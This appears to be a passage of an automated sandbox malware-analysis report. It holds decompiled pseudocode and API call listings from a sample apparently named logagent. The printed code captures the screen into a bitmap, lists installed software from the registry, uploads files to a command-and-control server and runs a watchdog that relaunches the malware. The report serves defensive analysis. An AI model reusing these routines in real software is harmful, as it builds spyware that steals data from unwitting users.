                                  				signed int _t193;
                                  				void* _t214;
                                  				signed int _t222;
                                  				signed char _t224;
                                  				signed int _t225;
                                  				signed int _t242;
                                  				struct HDC__* _t245;
                                  				int _t249;
                                  				struct tagBITMAPINFO* _t250;
                                  
                                  				_t214 = 0;
                                  				_t245 = CreateDCA("DISPLAY", 0, 0, 0);
                                  				_v16 = _t245;
                                  				_v8 = CreateCompatibleDC(_t245);
                                  				_t248 = 0x41bfc8 + _a12 * 4;
                                  				_v12 = E0040FECE( *((intOrPtr*)(0x41bfc8 + _a12 * 4)));
                                  				_t143 = E0040FF18( *(0x41bfc8 + _a12 * 4));
                                  				_v28 = _t143;
                                  				if(_v12 != 0 || _t143 != 0) {
                                  					_t144 = CreateCompatibleBitmap(_t245, _v12, _t143);
                                  					_a12 = _t144;
                                  					if(_t144 != _t214) {
                                  						if(SelectObject(_v8, _t144) != 0) {
                                  							_v24 = _t214;
                                  							asm("stosd");
                                  							E0040FF57( *_t248,  &_v24);
                                  							if(StretchBlt(_v8, _t214, _t214, _v12, _v28, _v16, _v24, _v20, _v12, _v28, 0xcc0020) != 0) {
                                  								if(_a8 != 0) {
                                  									_v96.cbSize = 0x14;
                                  									if(GetCursorInfo( &_v96) != 0 && GetIconInfo(_v96.hCursor,  &_v140) != 0) {
                                  										DeleteObject(_v140.hbmColor);
                                  										DeleteObject(_v140.hbmMask);
                                  										DrawIcon(_v8, _v96.ptScreenPos - _v140.xHotspot - _v24, _v80 - _v140.yHotspot - _v20, _v96.hCursor);
                                  										_t214 = 0;
                                  									}
                                  								}
                                  								_push( &_v120);
                                  								_t249 = 0x18;
                                  								if(GetObjectA(_a12, _t249, ??) != 0) {
                                  									_t153 = _v102 * _v104;
                                  									_t242 = 1;
                                  									if(_t153 != _t242) {
                                  										_t222 = 4;
                                  										if(_t153 > _t222) {
                                  											_t222 = 8;
                                  											if(_t153 <= _t222) {
                                  												goto L18;
                                  											}
                                  											_t222 = 0x10;
                                  											if(_t153 <= _t222) {
                                  												goto L18;
                                  											}
                                  											if(_t153 > _t249) {
                                  												_a8 = 0x20;
                                  												L28:
                                  												_push(0x28 + (_t242 << _a8) * 4);
                                  												L23:
                                  												_t250 = LocalAlloc(0x40, ??);
                                  												_t224 = _a8;
                                  												_t250->bmiHeader = 0x28;
                                  												_t250->bmiHeader.biWidth = _v116;
                                  												_t250->bmiHeader.biHeight = _v112;
                                  												_t250->bmiHeader.biPlanes = _v104;
                                  												_t250->bmiHeader.biBitCount = _v102;
                                  												if(_t224 < 0x18) {
                                  													_t193 = 1;
                                  													_t250->bmiHeader.biClrUsed = _t193 << _t224;
                                  												}
                                  												_t225 = 8;
                                  												asm("cdq");
                                  												_t250->bmiHeader.biCompression = _t214;
                                  												_t250->bmiHeader.biClrImportant = _t214;
                                  												_t164 = (_t250->bmiHeader.biWidth + 7) / _t225 * (_a8 & 0x0000ffff) * _t250->bmiHeader.biHeight;
                                  												_t250->bmiHeader.biSizeImage = _t164;
                                  												_t165 = GlobalAlloc(_t214, _t164);
                                  												_v12 = _t165;
                                  												if(_t165 != _t214) {
                                  													if(GetDIBits(_v8, _a12, _t214, _t250->bmiHeader.biHeight & 0x0000ffff, _t165, _t250, _t214) != 0) {
                                  														_v60 = 0x4d42;
                                  														_v54 = _t214;
                                  														_v52 = _t214;
                                  														_v58 = _t250->bmiHeader.biSizeImage + _t250->bmiHeader.biClrUsed * 4 + _t250->bmiHeader + 0xe;
                                  														_v50 = _t250->bmiHeader + 0xe + _t250->bmiHeader.biClrUsed * 4;
                                  														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
                                  														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
                                  														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z( &_v60, 0xe);
                                  														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
                                  														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_t250, 0x28);
                                  														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
                                  														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_v12, _t250->bmiHeader.biSizeImage);
                                  														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
                                  														DeleteObject(_a12);
                                  														GlobalFree(_v12);
                                  														DeleteDC(_v16);
                                  														DeleteDC(_v8);
                                  														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v76);
                                  														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  														goto L33;
                                  													}
                                  													DeleteDC(_v16);
                                  													DeleteDC(_v8);
                                  													DeleteObject(_a12);
                                  													GlobalFree(_v12);
                                  													_t189 =  &_a11;
                                  												} else {
                                  													DeleteDC(_v16);
                                  													DeleteDC(_v8);
                                  													DeleteObject(_a12);
                                  													_t189 =  &_a11;
                                  												}
                                  												goto L31;
                                  											}
                                  											_a8 = _t249;
                                  											_push(0x28);
                                  											goto L23;
                                  										}
                                  										L18:
                                  										_a8 = _t222;
                                  										goto L28;
                                  									}
                                  									_a8 = _t242;
                                  									goto L28;
                                  								} else {
                                  									DeleteDC(_v16);
                                  									DeleteDC(_v8);
                                  									DeleteObject(_a12);
                                  									_t189 =  &_a11;
                                  									goto L31;
                                  								}
                                  							}
                                  							DeleteDC(_v16);
                                  							DeleteDC(_v8);
                                  							DeleteObject(_a12);
                                  							_t189 =  &_a11;
                                  							goto L31;
                                  						}
                                  						DeleteDC(_t245);
                                  						DeleteDC(_v8);
                                  						DeleteObject(_a12);
                                  						_t189 =  &_a11;
                                  						goto L31;
                                  					}
                                  					DeleteDC(_t245);
                                  					DeleteDC(_v8);
                                  					DeleteObject(_t214);
                                  					_t189 =  &_a11;
                                  					goto L31;
                                  				} else {
                                  					_t189 =  &_a11;
                                  					L31:
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(0x415664, _t189);
                                  					L33:
                                  					return _a4;
                                  				}
                                  			}

                                  APIs
                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                  • CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                    • Part of subcall function 0040FECE: GetMonitorInfoW.USER32(?,?), ref: 0040FEEE
                                    • Part of subcall function 0040FF18: GetMonitorInfoW.USER32(0040FA91,?), ref: 0040FF38
                                  • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0040FAAC
                                  • DeleteDC.GDI32(00000000), ref: 0040FAC0
                                  • DeleteDC.GDI32(00000000), ref: 0040FAC5
                                  • DeleteObject.GDI32(00000000), ref: 0040FAC8
                                  • SelectObject.GDI32(00000000,00000000), ref: 0040FADA
                                  • DeleteDC.GDI32(00000000), ref: 0040FAEB
                                  • DeleteDC.GDI32(00000000), ref: 0040FAF0
                                  • DeleteObject.GDI32(00410983), ref: 0040FAF5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD5E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD6B
                                  • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00004D42,0000000E), ref: 0040FD7A
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FD87
                                  • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00000000,00000028), ref: 0040FD93
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDA0
                                  • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,?), ref: 0040FDAF
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDBC
                                  • DeleteObject.GDI32(00410983), ref: 0040FDC5
                                  • GlobalFree.KERNEL32 ref: 0040FDCA
                                  • DeleteDC.GDI32(00000000), ref: 0040FDD9
                                  • DeleteDC.GDI32(00000000), ref: 0040FDDE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040FDE7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$Delete$??0?$basic_string@ObjectV01@@$?assign@?$basic_string@CreateD@1@@V01@V12@Y?$basic_string@$??1?$basic_string@CompatibleInfoMonitor$BitmapFreeGlobalSelect
                                  • String ID: $BM$DISPLAY
                                  • API String ID: 585525397-871886180
                                  • Opcode ID: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                  • Instruction ID: 6bc9ab2a81804b36ace2e86e9fd4fad5708e5c5067481f6dd5077a8177631ab2
                                  • Opcode Fuzzy Hash: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                  • Instruction Fuzzy Hash: 17C1E37190020DEFDF209FA0DC849DEBBB9FF48314F10843AE915A62A0D735AA59DF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                  • CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000,?,0041B310,00000000), ref: 00403845
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040385C
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • GetFileSize.KERNEL32(00000000,?,?,0041B310,00000000), ref: 0040387B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 004038AA
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 004038C8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 004038D9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004038EA
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004038F3
                                  • ??2@YAPAXI@Z.MSVCRT ref: 00403940
                                  • SetFilePointer.KERNEL32(?,?,?,?), ref: 00403954
                                  • ReadFile.KERNEL32(?,?,0000FDE8,?,?), ref: 00403968
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 00403978
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?), ref: 0040398E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403B9B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BA4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BAD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$File$G@2@@std@@G@std@@$D@1@@G@1@@V01@@$??2@CreateD@2@@0@Hstd@@PointerReadSizeV10@@V?$basic_string@socket
                                  • String ID: Uploading file to C&C: $[INFO]
                                  • API String ID: 368904453-3151135581
                                  • Opcode ID: 2e7112c3a2b21cdbcd178a8ca4ad1c354f83c13bbd5c27c7c4e68fb240423237
                                  • Instruction ID: b6d78ebecc7f0a5a63fa064e60f12d61dcf64d9c80a512a797ec440d8275d993
                                  • Opcode Fuzzy Hash: 2e7112c3a2b21cdbcd178a8ca4ad1c354f83c13bbd5c27c7c4e68fb240423237
                                  • Instruction Fuzzy Hash: B8C107B1C0010DEBDF05EFA1EC89DEEBB78EF54345F10806AF415A21A1EB755A89CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 004130DF
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004130F5
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00413116
                                  • RegEnumKeyExA.ADVAPI32 ref: 00413135
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00413160
                                  • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 004131DD
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,0041623C), ref: 0041321D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00416AFC,0041623C), ref: 0041322D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@G@2@@0@Hstd@@OpenV?$basic_string@$?empty@?$basic_string@EnumV10@V10@0@
                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                  • API String ID: 1820998543-3714951968
                                  • Opcode ID: 216b46f8e007e87f0a84d038c9d0dd50959d9b889a890c0fee36900767b7dc02
                                  • Instruction ID: 27b32b71c815465ffb7daa5c7642a7d313003b3f6ade3c30451be995a5edf32b
                                  • Opcode Fuzzy Hash: 216b46f8e007e87f0a84d038c9d0dd50959d9b889a890c0fee36900767b7dc02
                                  • Instruction Fuzzy Hash: D791F87280011DEBCB10EB91DD49EEEBB7CEF54304F1444A6B506A3051EB759B88CFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 36%
                                  			E0040A906(void* __eflags, long _a4) {
                                  				char _v5;
                                  				void* _v12;
                                  				char _v28;
                                  				void _v526;
                                  				signed short _v528;
                                  				short _v548;
                                  				short _v1068;
                                  				short _v1588;
                                  				short _v2108;
                                  				long _t38;
                                  				void* _t40;
                                  				void* _t45;
                                  				long _t48;
                                  				void* _t49;
                                  				char _t50;
                                  				intOrPtr _t53;
                                  				intOrPtr _t54;
                                  				intOrPtr _t55;
                                  				void* _t57;
                                  				char _t59;
                                  				void* _t60;
                                  				char _t67;
                                  				void* _t70;
                                  				char _t81;
                                  				intOrPtr* _t84;
                                  				void* _t117;
                                  				void* _t121;
                                  				void* _t127;
                                  				void* _t129;
                                  				void* _t130;
                                  				void* _t131;
                                  				void* _t132;
                                  
                                  				_t117 = 0;
                                  				CreateMutexA(0, 1,  *0x41b15c);
                                  				_t38 = GetModuleFileNameW(0,  &_v2108, 0x104);
                                  				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t40 = E0040B692(0x80000001,  &_v548, "exepath",  &_v548, 0x208, _t38, _t38);
                                  				_t130 = _t129 + 0x1c;
                                  				if(_t40 == 0) {
                                  					exit(0);
                                  				}
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                  				if(E00412DDF( &_v548,  &_v28) == 0) {
                                  					exit(_t117);
                                  				}
                                  				while(1) {
                                  					_t45 = OpenProcess(0x100000, _t117, _a4);
                                  					_v12 = _t45;
                                  					WaitForSingleObject(_t45, 0xffffffff);
                                  					CloseHandle(_v12);
                                  					_t48 = GetCurrentProcessId();
                                  					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  					_t49 = E0040B829(0x80000001, _t48, "WDH", _t48);
                                  					_t131 = _t130 + 0x10;
                                  					if(_t49 == 0) {
                                  						break;
                                  					}
                                  					if(PathFileExistsW( &_v548) != 0) {
                                  						L7:
                                  						ShellExecuteW(_t117, L"open",  &_v548, _t117, _t117, 1);
                                  						L10:
                                  						do {
                                  							L11:
                                  							_t121 = "WD";
                                  							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  							_t67 = E0040B4C8(0x41ba38, 0x80000001,  &_a4, _t121,  &_a4);
                                  							_t131 = _t131 + 0x10;
                                  							_v5 = _t67;
                                  							_t141 = _t67;
                                  							if(_t67 == 0) {
                                  								Sleep(0x1f4);
                                  							} else {
                                  								__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t121);
                                  								_push(_t67);
                                  								_push(0x80000001);
                                  								E0040B95B(_t141);
                                  								_t131 = _t131 + 0xc;
                                  							}
                                  						} while (_v5 == 0);
                                  						_t117 = 0;
                                  						continue;
                                  					}
                                  					__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  					_t70 = E00412D56( &_v28,  &_v548,  &_v548,  &_v548, _t117);
                                  					_t131 = _t131 + 0x10;
                                  					if(_t70 == 0) {
                                  						memset( &_v1588, 0, 0x82 << 2);
                                  						GetTempPathW(0x104,  &_v1588);
                                  						GetTempFileNameW( &_v1588, L"temp_", 0,  &_v1068);
                                  						lstrcatW( &_v1068, L".exe");
                                  						__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  						_t81 = E00412D56( &_v28,  &_v1068,  &_v1068,  &_v1068, 0);
                                  						_t131 = _t131 + 0x1c;
                                  						__eflags = _t81;
                                  						if(_t81 == 0) {
                                  							goto L11;
                                  						}
                                  						__eflags = 0;
                                  						ShellExecuteW(0, L"open",  &_v1068, 0, 0, 1);
                                  						goto L10;
                                  					}
                                  					goto L7;
                                  				}
                                  				exit(1);
                                  				_t132 = _t131 - 0x208;
                                  				_t84 = __imp__??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z;
                                  				_t50 =  *_t84(0x41ba28, 0x415800, _t117, 0x80000001, 0x41ba38, _t127);
                                  				__eflags = _t50;
                                  				if(_t50 == 0) {
                                  					L22:
                                  					__eflags =  *0x41bd68;
                                  					if( *0x41bd68 == 0) {
                                  						L27:
                                  						__eflags = 0;
                                  						return 0;
                                  					}
                                  					do {
                                  						Sleep(0xbb8);
                                  						__eflags =  *0x41ba21;
                                  						if(__eflags != 0) {
                                  							__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  							_t53 =  *0x41ba20; // 0x0
                                  							_t54 =  *0x41bc64; // 0x0
                                  							_t55 =  *0x41ba58; // 0x1
                                  							_t50 = E00407D53(0x41ba48, _t55, _t54, _t53, _t50);
                                  							_t132 = _t132 + 0x10;
                                  						}
                                  						__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  						__imp__?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
                                  						__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  						_t50 = E0040B8F8(__eflags, 0x80000001, _t50 + _t50 + 2, "exepath", _t50 + _t50 + 2, _t50 + _t50 + 2, _t50, _t50, 3);
                                  						_t132 = _t132 + 0x20;
                                  						__eflags =  *0x41bd68;
                                  					} while ( *0x41bd68 != 0);
                                  					goto L27;
                                  				} else {
                                  					_v528 = _v528 & 0x00000000;
                                  					_t57 = memset( &_v526, 0, 0x81 << 2);
                                  					asm("stosw");
                                  					__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  					_t59 = E0040B692(0x80000001,  &_v528, "exepath",  &_v528, 0x410, _t57, _t57);
                                  					_t132 = _t132 + 0x28;
                                  					__eflags = _t59;
                                  					if(_t59 != 0) {
                                  						__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z( &_v528);
                                  					}
                                  					_t50 =  *_t84(0x41ba28, 0x415800);
                                  					__eflags = _t50;
                                  					if(_t50 == 0) {
                                  						goto L22;
                                  					} else {
                                  						_t60 = 1;
                                  						return _t60;
                                  					}
                                  				}
                                  			}

                                  0x0040a912
                                  0x0040a91d
                                  0x0040a930
                                  0x0040a93d
                                  0x0040a946
                                  0x0040a965
                                  0x0040a972
                                  0x0040a977
                                  0x0040a97c
                                  0x0040a97f
                                  0x0040a97f
                                  0x0040a98c
                                  0x0040a9a6
                                  0x0040a9a9
                                  0x0040a9a9
                                  0x0040a9af
                                  0x0040a9b8
                                  0x0040a9c1
                                  0x0040a9c4
                                  0x0040a9cd
                                  0x0040a9d3
                                  0x0040a9e1
                                  0x0040a9e9
                                  0x0040a9ee
                                  0x0040a9f3
                                  0x00000000
                                  0x00000000
                                  0x0040aa08
                                  0x0040aa32
                                  0x0040aad2
                                  0x0040aad2
                                  0x0040aad8
                                  0x0040aad8
                                  0x0040aadb
                                  0x0040aae4
                                  0x0040aaec
                                  0x0040aaf1
                                  0x0040aaf4
                                  0x0040aaf7
                                  0x0040aaf9
                                  0x0040ab15
                                  0x0040aafb
                                  0x0040aafe
                                  0x0040ab04
                                  0x0040ab05
                                  0x0040ab06
                                  0x0040ab0b
                                  0x0040ab0b
                                  0x0040ab1b
                                  0x0040ab21
                                  0x00000000
                                  0x0040ab21
                                  0x0040aa15
                                  0x0040aa1f
                                  0x0040aa26
                                  0x0040aa2b
                                  0x0040aa30
                                  0x0040aa55
                                  0x0040aa63
                                  0x0040aa7e
                                  0x0040aa90
                                  0x0040aaa2
                                  0x0040aaac
                                  0x0040aab3
                                  0x0040aab8
                                  0x0040aabb
                                  0x0040aabd
                                  0x00000000
                                  0x00000000
                                  0x0040aabf
                                  0x0040aad2
                                  0x00000000
                                  0x0040aad2
                                  0x00000000
                                  0x0040aa30
                                  0x0040ab2a
                                  0x0040ab33
                                  0x0040ab3a
                                  0x0040ab4c
                                  0x0040ab54
                                  0x0040ab57
                                  0x0040abe2
                                  0x0040abe2
                                  0x0040abe9
                                  0x0040ac83
                                  0x0040ac83
                                  0x00000000
                                  0x0040ac83
                                  0x0040abf4
                                  0x0040abf9
                                  0x0040abff
                                  0x0040ac06
                                  0x0040ac0d
                                  0x0040ac14
                                  0x0040ac1a
                                  0x0040ac20
                                  0x0040ac26
                                  0x0040ac2b
                                  0x0040ac2b
                                  0x0040ac32
                                  0x0040ac3b
                                  0x0040ac44
                                  0x0040ac51
                                  0x0040ac62
                                  0x0040ac6e
                                  0x0040ac73
                                  0x0040ac76
                                  0x0040ac76
                                  0x00000000
                                  0x0040ab5d
                                  0x0040ab5d
                                  0x0040ab72
                                  0x0040ab76
                                  0x0040ab78
                                  0x0040ab81
                                  0x0040ab9e
                                  0x0040abaa
                                  0x0040abaf
                                  0x0040abb2
                                  0x0040abb4
                                  0x0040abc2
                                  0x0040abc2
                                  0x0040abd2
                                  0x0040abd5
                                  0x0040abd8
                                  0x00000000
                                  0x0040abda
                                  0x0040abdc
                                  0x00000000
                                  0x0040abdc
                                  0x0040abd8

                                  APIs
                                  • CreateMutexA.KERNEL32(00000000,00000001,0041BA38,0041BCB0,00000000), ref: 0040A91D
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040A930
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040A93D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A946
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 0040A965
                                    • Part of subcall function 0040B692: RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
                                  • exit.MSVCRT ref: 0040A97F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A98C
                                  • exit.MSVCRT ref: 0040A9A9
                                  • OpenProcess.KERNEL32(00100000,00000000,80000001), ref: 0040A9B8
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040A9C4
                                  • CloseHandle.KERNEL32(80000001), ref: 0040A9CD
                                  • GetCurrentProcessId.KERNEL32 ref: 0040A9D3
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,00000000), ref: 0040A9E1
                                  • PathFileExistsW.SHLWAPI(?), ref: 0040AA00
